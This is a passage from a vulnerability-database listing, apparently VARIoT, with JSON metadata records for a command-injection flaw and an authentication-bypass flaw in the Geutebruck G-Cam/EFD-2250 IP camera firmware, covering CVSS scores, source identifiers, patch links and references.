Find a vulnerability
Search criteria
27 vulnerabilities by geutebrueck
VAR-201705-3255
Vulnerability from variot - Updated: 2025-04-20 21:54An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker exploited the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. Attackers may exploit these issues to gain unauthorized access to the affected device and to execute arbitrary code within the context of the affected device. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by German Geutebruck company
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.1,
"vendor": "geutebruck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": "ip camera g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 0.6,
"vendor": "geutebrueck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": "ip camera g-cam efd-2250",
"scope": "eq",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "ip camera g cam efd 2250",
"version": "1.11.0.12"
}
],
"sources": [
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
},
{
"db": "NVD",
"id": "CVE-2017-5173"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
}
]
},
"credits": {
"_id": null,
"data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
"sources": [
{
"db": "BID",
"id": "96209"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5173",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5173",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-01889",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-113376",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-5173",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5173",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5173",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-5173",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-01889",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-611",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-113376",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-5173",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "VULHUB",
"id": "VHN-113376"
},
{
"db": "VULMON",
"id": "CVE-2017-5173"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
},
{
"db": "NVD",
"id": "CVE-2017-5173"
}
]
},
"description": {
"_id": null,
"data": "An Improper Neutralization of Special Elements (in an OS command) issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An improper neutralization of special elements vulnerability has been identified. If special elements are not properly neutralized, an attacker can call multiple parameters that can allow access to the root level operating system which could allow remote code execution. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. A remote code execution vulnerability exists in Geutebruck G-Cam/EFD-2250. An attacker exploited the vulnerability to execute arbitrary code. A failed attack can result in a denial of service. \nAttackers may exploit these issues to gain unauthorized access to the affected device and to execute arbitrary code within the context of the affected device. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is a network camera produced by German Geutebruck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5173"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "VULHUB",
"id": "VHN-113376"
},
{
"db": "VULMON",
"id": "CVE-2017-5173"
}
],
"trust": 2.79
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-113376",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113376"
},
{
"db": "VULMON",
"id": "CVE-2017-5173"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2017-5173",
"trust": 3.8
},
{
"db": "ICS CERT",
"id": "ICSA-17-045-02",
"trust": 2.9
},
{
"db": "BID",
"id": "96209",
"trust": 2.7
},
{
"db": "EXPLOIT-DB",
"id": "41360",
"trust": 1.8
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2017-01889",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263",
"trust": 0.8
},
{
"db": "IVD",
"id": "05EBD79B-F06D-41C7-986C-D7D4284611B4",
"trust": 0.2
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141142",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-113376",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5173",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "VULHUB",
"id": "VHN-113376"
},
{
"db": "VULMON",
"id": "CVE-2017-5173"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
},
{
"db": "NVD",
"id": "CVE-2017-5173"
}
]
},
"id": "VAR-201705-3255",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "VULHUB",
"id": "VHN-113376"
}
],
"trust": 1.80833335
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
},
{
"category": [
"camera device"
],
"sub_category": "IP camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
}
]
},
"last_update_date": "2025-04-20T21:54:54.269000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "Patch for Geutebruck G-Cam/EFD-2250 Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/89709"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68204"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-943",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "NVD",
"id": "CVE-2017-5173"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.7,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/96209"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/41360/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5173"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5173"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
},
{
"trust": 0.3,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/943.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52662"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
},
{
"db": "VULHUB",
"id": "VHN-113376"
},
{
"db": "VULMON",
"id": "CVE-2017-5173"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
},
{
"db": "NVD",
"id": "CVE-2017-5173"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "OTHER",
"id": null,
"ident": null
},
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
"ident": null
},
{
"db": "CNVD",
"id": "CNVD-2017-01889",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-113376",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2017-5173",
"ident": null
},
{
"db": "BID",
"id": "96209",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004263",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201702-611",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2017-5173",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2017-02-24T00:00:00",
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4",
"ident": null
},
{
"date": "2017-02-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-01889",
"ident": null
},
{
"date": "2017-05-19T00:00:00",
"db": "VULHUB",
"id": "VHN-113376",
"ident": null
},
{
"date": "2017-05-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5173",
"ident": null
},
{
"date": "2017-02-14T00:00:00",
"db": "BID",
"id": "96209",
"ident": null
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004263",
"ident": null
},
{
"date": "2017-02-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-611",
"ident": null
},
{
"date": "2017-05-19T03:29:00.183000",
"db": "NVD",
"id": "CVE-2017-5173",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2017-02-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-01889",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-113376",
"ident": null
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5173",
"ident": null
},
{
"date": "2017-03-07T04:02:00",
"db": "BID",
"id": "96209",
"ident": null
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004263",
"ident": null
},
{
"date": "2022-02-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-611",
"ident": null
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-5173",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Geutebruck G-Cam/EFD-2250 Remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "05ebd79b-f06d-41c7-986c-d7d4284611b4"
},
{
"db": "CNVD",
"id": "CNVD-2017-01889"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-611"
}
],
"trust": 0.6
}
}
VAR-201705-3256
Vulnerability from variot - Updated: 2025-04-20 20:41An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control that may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker exploited the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. G-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is germany Geutebruck A network camera of the company
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ip camera g-cam efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebruck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.1,
"vendor": "geutebruck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 0.6,
"vendor": "geutebrueck",
"version": "1.11.0.12"
},
{
"_id": null,
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "ip camera g cam efd 2250",
"version": "1.11.0.12"
}
],
"sources": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
},
{
"db": "NVD",
"id": "CVE-2017-5174"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
}
]
},
"credits": {
"_id": null,
"data": "Florent Montel, Frederic Cikala, and Davy Douhine of RandoriSec",
"sources": [
{
"db": "BID",
"id": "96209"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5174",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5174",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-01888",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-113377",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-5174",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5174",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-5174",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-01888",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-610",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-113377",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-5174",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "VULMON",
"id": "CVE-2017-5174"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
},
{
"db": "NVD",
"id": "CVE-2017-5174"
}
]
},
"description": {
"_id": null,
"data": "An Authentication Bypass issue was discovered in Geutebruck IP Camera G-Cam/EFD-2250 Version 1.11.0.12. An authentication bypass vulnerability has been identified. The existing file system architecture could allow attackers to bypass the access control that may allow remote code execution. Geutebruck IP Camera G-Cam/EFD-2250 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Geutebruck G-Cam/EFD-2250 provides a faster and safer solution for remote monitoring applications. An attacker exploited the vulnerability to gain unauthorized access to the affected device environment. Failed exploit attempts may result in a denial-of-service condition. \nG-Cam/EFD-2250 1.11.0.12 is vulnerable; other versions may also be affected. Geutebruck IP Camera G-Cam/EFD-2250 is germany Geutebruck A network camera of the company",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5174"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "VULMON",
"id": "CVE-2017-5174"
}
],
"trust": 2.79
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-113377",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41360",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "VULMON",
"id": "CVE-2017-5174"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2017-5174",
"trust": 3.7
},
{
"db": "ICS CERT",
"id": "ICSA-17-045-02",
"trust": 2.9
},
{
"db": "BID",
"id": "96209",
"trust": 2.7
},
{
"db": "EXPLOIT-DB",
"id": "41360",
"trust": 1.8
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2017-01888",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264",
"trust": 0.8
},
{
"db": "IVD",
"id": "409C1FE8-A44C-4075-B30D-BC6E6046C75F",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-113377",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5174",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "VULMON",
"id": "CVE-2017-5174"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
},
{
"db": "NVD",
"id": "CVE-2017-5174"
}
]
},
"id": "VAR-201705-3256",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "VULHUB",
"id": "VHN-113377"
}
],
"trust": 1.7083333500000002
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f"
},
{
"db": "CNVD",
"id": "CNVD-2017-01888"
}
]
},
"last_update_date": "2025-04-20T20:41:54.247000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "Geutebruck G-Cam/EFD-2250 authentication bypass vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/89708"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68205"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-288",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "NVD",
"id": "CVE-2017-5174"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.7,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/96209"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/41360/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5174"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5174"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
},
{
"trust": 0.3,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-02 "
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-01888"
},
{
"db": "VULHUB",
"id": "VHN-113377"
},
{
"db": "VULMON",
"id": "CVE-2017-5174"
},
{
"db": "BID",
"id": "96209"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610"
},
{
"db": "NVD",
"id": "CVE-2017-5174"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
"ident": null
},
{
"db": "CNVD",
"id": "CNVD-2017-01888",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-113377",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2017-5174",
"ident": null
},
{
"db": "BID",
"id": "96209",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004264",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201702-610",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2017-5174",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2017-02-24T00:00:00",
"db": "IVD",
"id": "409c1fe8-a44c-4075-b30d-bc6e6046c75f",
"ident": null
},
{
"date": "2017-02-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-01888",
"ident": null
},
{
"date": "2017-05-19T00:00:00",
"db": "VULHUB",
"id": "VHN-113377",
"ident": null
},
{
"date": "2017-05-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5174",
"ident": null
},
{
"date": "2017-02-14T00:00:00",
"db": "BID",
"id": "96209",
"ident": null
},
{
"date": "2017-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004264",
"ident": null
},
{
"date": "2017-02-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-610",
"ident": null
},
{
